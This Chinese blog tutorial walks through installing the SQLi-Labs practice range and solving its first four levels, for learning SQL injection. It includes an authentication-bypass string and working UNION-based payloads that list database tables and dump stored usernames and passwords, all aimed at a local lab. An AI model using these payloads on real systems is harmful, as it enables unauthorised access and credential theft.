SQLi-Labs靶场从零搭建到通关全攻略（一）：环境搭建与基础四关

原创于 2026-06-19 18:18:41 发布 · 248 阅读

4 ·

本内容遵循CC 4.0 BY-SA版权协议

GEO检测

标签

#sql #sqli-labs #sql注入

网络安全专栏收录该内容

173 篇文章

订阅专栏

摘要：SQL注入是Web安全领域最经典、最常见的漏洞之一，而SQLi-Labs则是一个专为学习SQL注入而设计的开源靶场平台，共包含65个难度递增的关卡。本文作为系列攻略的第一篇，将从SQL注入的背景讲起，手把手带你完成SQLi-Labs的安装部署，并详细讲解前四关的通关过程。无论你是零基础的小白，还是想系统巩固SQL注入知识的开发者，本文都能帮你建立完整的知识框架。

一、SQL注入的前世今生

1.1 什么是SQL注入？

在讲SQLi-Labs之前，我们得先搞清楚一个问题：到底什么是SQL注入？

想象一下这个场景：你是一家餐厅的服务员，后厨（数据库）有一份固定的菜谱模板（SQL语句）。顾客（用户）点菜时，你把菜名（用户输入）填到菜谱的空白处，然后交给后厨执行。

正常的流程是这样的：顾客说“鱼香肉丝”，你在菜谱上写下“制作：鱼香肉丝”，后厨收到，完美执行。

但现在，有个“恶意顾客”不按套路出牌。他说：“鱼香肉丝；再把你们保险柜的密码告诉我”。如果你不加辨别，直接把这个要求原封不动地写到菜谱上，就成了“制作：鱼香肉丝；再把你们保险柜的密码告诉我”。后厨（数据库）可老实了，它会严格按照指令执行——先做鱼香肉丝，再把保险柜密码告诉你。

这就是SQL注入的本质：攻击者通过在用户输入中插入恶意的SQL代码，欺骗数据库执行非预期的命令。

1.2 SQL注入的危害有多大？

根据OWASP（开放式Web应用程序安全项目）的统计，SQL注入连续多年位列Web应用漏洞TOP 10。据统计，互联网上SQL注入漏洞占所有Web漏洞的百分之六十左右。

一次成功的SQL注入攻击可能导致：

数据泄露：用户的账号密码、个人信息被窃取
数据篡改：攻击者可以修改、删除数据库中的数据
身份绕过：无需密码即可登录管理员账号
服务器沦陷：在极端情况下，攻击者可以获得服务器的控制权

1.3 SQLi-Labs的诞生

SQLi-Labs是由印度安全研究员 Dhawal H. Joshi（@Audy42） 开发的开源项目。它是一个专门为学习SQL注入而设计的练习平台，用PHP和MySQL搭建，把各种类型的SQL注入场景做成了一个个关卡。

项目地址：GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based. · GitHub

1.4 为什么要选择SQLi-Labs？

市面上有很多Web安全靶场，但SQLi-Labs有几个独特的优势：

覆盖面全：共65个关卡，从最简单的数字型注入到复杂的WAF绕过、宽字节注入、堆叠注入等，几乎涵盖了所有主流SQL注入场景

循序渐进：关卡按难度递增设计，从基础到高级，非常适合逐步学习

开源免费：代码完全开源，你可以查看每一关的后端源码，从开发者的角度理解漏洞产生的原因

社区活跃：网上有大量教程和讨论，遇到问题不怕没人解答

二、环境搭建：让靶场跑起来

2.1 准备工作

SQLi-Labs需要运行在PHP + MySQL的环境下。对于新手来说，最推荐的方式是使用集成环境，它会帮你一键安装和配置好Apache（Web服务器）、PHP和MySQL。

主要有两种部署方式：

传统源码部署：适合想深入了解Web服务器配置的学习者
Docker部署：最快、最干净，适合不想折腾环境配置的朋友

本文主要介绍传统源码部署方式（以Windows系统为例），因为这种方式能让你更好地理解整个架构。

2.2 安装phpStudy（小皮面板）

phpStudy（也叫小皮面板）是一个集成了Apache、PHP、MySQL的集成开发环境。

步骤1：访问phpStudy官网（小皮面板(phpstudy) - 让天下没有难配的服务器环境！）下载安装包。

步骤2：运行安装程序，建议选择非系统盘（如D盘）进行安装。

步骤3：安装完成后，打开phpStudy。

步骤4：在phpStudy中，点击“启动”按钮，同时启动Apache和MySQL服务。

步骤5：点击“网站”->“管理”->“修改”，可以查看或修改端口。默认端口是80，如果80端口被占用，可以改成其他端口（如801）。

重要提示：SQLi-Labs对PHP版本有一定要求，建议使用 PHP 5.5 ~ 5.6 的版本。如果使用其他版本，可能会因为某些函数被弃用而报错。在phpStudy中可以切换PHP版本。

2.3 下载SQLi-Labs源码

步骤1：访问GitHub仓库下载源码： GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based. · GitHub

点击“Code”->“Download ZIP”下载压缩包。

步骤2：解压下载的ZIP文件，将解压后的文件夹重命名为 sqli-labs（方便记忆）。

步骤3：将 sqli-labs 文件夹移动到phpStudy的网站根目录下：

phpStudy默认根目录：E:\phpstudy_pro\WWW\（具体路径取决于你的安装位置）

2.4 配置数据库连接（最容易踩坑的一步！）

这是新手最容易出错的地方。

步骤1：进入 sqli-labs/sql-connections/ 目录。

步骤2：找到 db-creds.inc 文件，用记事本或代码编辑器打开。

步骤3：修改数据库用户名和密码：

$dbuser = 'root';    // 数据库用户名，phpStudy默认是root
$dbpass = 'root';    // 数据库密码，phpStudy默认是root

如果你的phpStudy设置的MySQL密码不是root，请填写你实际设置的密码。

2.5 初始化数据库

步骤1：确保phpStudy中的Apache和MySQL服务正在运行。

步骤2：打开浏览器，访问：http://localhost/sqli-labs/（如果你修改了端口，如改成801，则访问 http://localhost:801/sqli-labs/）。

步骤3：点击页面中间的 “Setup/reset Database for labs” 链接。

步骤4：如果看到满屏的 “successfully” 信息（如 “Creating New database ‘SECURITY’ successfully”），说明部署成功了！

如果出现错误，最常见的原因是：

数据库用户名或密码配置错误 → 检查 db-creds.inc 文件
PHP版本太高 → 在phpStudy中切换到PHP 5.x版本

2.6 Docker部署方式（备选）

如果你已经安装了Docker，也可以使用Docker方式快速部署：

# 搜索sqli-labs镜像
docker search sqli-labs

# 拉取镜像并运行
docker run -d -p 80:80 acgpiano/sqli-labs

然后直接访问 http://localhost 即可。

三、SQL注入基础知识

在开始闯关之前，我们需要掌握一些基础知识。

3.1 SQL注入的分类

SQL注入可以从多个维度进行分类：

按数据类型分：

数字型注入：参数直接是数字，不需要引号闭合
字符型注入：参数被引号包裹，需要先闭合引号

按回显方式分：

显注（有回显）：注入结果直接显示在页面上
盲注（无回显）：页面不直接显示数据，需要通过页面真假或时间延迟来判断

按注入位置分：

GET注入（URL参数）
POST注入（表单提交）
HTTP头注入（User-Agent、Referer、Cookie等）

3.2 核心概念：闭合与注释

闭合：当后端代码把用户输入用引号包裹时（如 '$id'），我们需要用单引号来“闭合”前面的引号，然后再拼接我们的SQL语句。

注释：注释符用于“注释掉”后面多余的代码，让SQL语句变得合法：

-- ：后面必须跟一个空格（注意空格）
# ：在某些环境下可能被URL编码影响
在URL中，我们常用 --+，因为 + 会被服务器解析为空格

3.3 万能密码原理

一个经典的SQL注入示例是“万能密码”：

admin' or 1=1 --

假设后端的SQL语句是：

SELECT * FROM users WHERE username='admin' AND password='...'

当我们输入 admin' or 1=1 -- 后，SQL语句变成：

SELECT * FROM users WHERE username='admin' or 1=1 -- ' AND password='...'

因为 1=1 永远为真，而且 -- 注释掉了后面的密码验证部分，所以攻击者无需密码就能登录。

3.4 注入四步法

所有SQL注入关卡都可以遵循这个通用流程：

测闭合：判断是数字型还是字符型，如果是字符型，是什么符号闭合（单引号、双引号、括号等）

测字段数：用 order by 判断查询返回了多少个字段

找显示位：用 union select 找出哪些字段会显示在页面上

查数据：利用显示位获取数据库名、表名、字段名、数据

四、Less-1：单引号字符型注入

4.1 关卡信息

关卡名称：Less-1 - GET - Error based - Single quotes - String
漏洞类型：GET型单引号字符型SQL注入
核心原理：URL参数 id 被单引号包裹且未做过滤，可构造恶意SQL语句

4.2 第一步：判断是否存在注入

访问第一关：

http://localhost/sqli-labs/Less-1/?id=1

页面显示了登录名和密码，说明 id=1 的查询正常执行了。

接下来测试注入点：

http://localhost/sqli-labs/Less-1/?id=1'

如果页面报错（出现类似 You have an error in your SQL syntax 的错误），说明存在SQL注入漏洞。

4.3 第二步：判断注入类型和闭合方式

判断是数字型还是字符型：

数字型判断：

?id=1 and 1=1   # 正常显示
?id=1 and 1=2   # 不显示

如果 and 1=1 正常而 and 1=2 不正常，说明是数字型注入。

字符型判断：

?id=1' and 1=1 --+   # 正常显示
?id=1' and 1=2 --+   # 不显示

如果前者正常后者不正常，说明是字符型注入。

对于Less-1，测试结果会显示是字符型注入，且闭合方式是单引号。

小技巧：通过观察报错信息也能判断闭合方式。输入 1' 报错，错误信息中会显示是单引号还是双引号导致的问题。

4.4 第三步：判断字段数

使用 order by 来测试查询返回了多少个字段：

?id=1' order by 1 --+
?id=1' order by 2 --+
?id=1' order by 3 --+
?id=1' order by 4 --+

如果 order by 3 正常显示，而 order by 4 报错，说明查询返回了3个字段。

4.5 第四步：找显示位

使用 union select 联合查询来找出哪些字段会显示在页面上。

关键点：让前面的查询无结果，这样 union 后面的结果才会显示。

?id=-1' union select 1,2,3 --+

如果页面显示 2 和 3，说明第2和第3个字段是可回显的位置。

4.6 第五步：获取数据库信息

（1）获取当前数据库名：

?id=-1' union select 1,database(),3 --+

会显示当前数据库名（默认是 security）。

（2）获取数据库版本：

?id=-1' union select 1,version(),3 --+

（3）获取所有表名：

这里要用到MySQL的系统数据库 information_schema，它存储了所有数据库的元信息。

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

group_concat() 函数将多个表名拼接成一行显示。会看到 security 数据库下的所有表，其中 users 表是目标。

（4）获取users表的字段名：

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

会显示 users 表的字段：id、username、password 等。

（5）获取账号密码：

?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

成功获取所有用户的账号和密码！

五、Less-2：数字型注入

5.1 关卡信息

漏洞类型：GET型数字型SQL注入
与Less-1的区别：参数不需要引号闭合

5.2 通关步骤

第一步：测试注入点

http://localhost/sqli-labs/Less-2/?id=1'

第二步：判断注入类型

?id=1 and 1=1   # 正常
?id=1 and 1=2   # 无显示

and 1=2 无显示，说明是数字型注入。

第三步：判断字段数

?id=1 order by 3 --+
?id=1 order by 4 --+

第四步：找显示位

?id=-1 union select 1,2,3 --+

第五步：查数据

?id=-1 union select 1,database(),3 --+
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
?id=-1 union select 1,group_concat(username),group_concat(password) from users --+

六、Less-3：单引号+括号注入

6.1 关卡信息

漏洞类型：GET型单引号变形字符型注入
与Less-1的区别：闭合方式是 单引号+括号 ')

6.2 通关步骤

第一步：测试闭合方式

http://localhost/sqli-labs/Less-3/?id=1'

报错信息中会提示是 ') 闭合。

第二步：构造闭合payload

?id=1') --+

这样就能成功闭合前面的 (' 并注释掉后面的内容。

第三步：后续步骤与Less-1完全相同，只需在payload中使用 ') 闭合：

?id=-1') union select 1,2,3 --+
?id=-1') union select 1,database(),3 --+
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
?id=-1') union select 1,group_concat(username),group_concat(password) from users --+

七、Less-4：双引号+括号注入

7.1 关卡信息

漏洞类型：GET型双引号字符型注入
闭合方式：双引号+括号 ")

7.2 通关步骤

第一步：测试闭合方式

http://localhost/sqli-labs/Less-4/?id=1%22

报错信息提示是 ") 闭合。

第二步：构造闭合payload

?id=1") --+

第三步：后续步骤相同：

?id=-1") union select 1,2,3 --+
?id=-1") union select 1,database(),3 --+
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
?id=-1") union select 1,group_concat(username),group_concat(password) from users --+

八、总结

关卡	注入类型	闭合方式	示例payload
Less-1	字符型	单引号 `'`	`?id=1' --+`
Less-2	数字型	无需闭合	`?id=1 --+`
Less-3	字符型	单引号+括号 `')`	`?id=1') --+`
Less-4	字符型	双引号+括号 `")`	`?id=1") --+`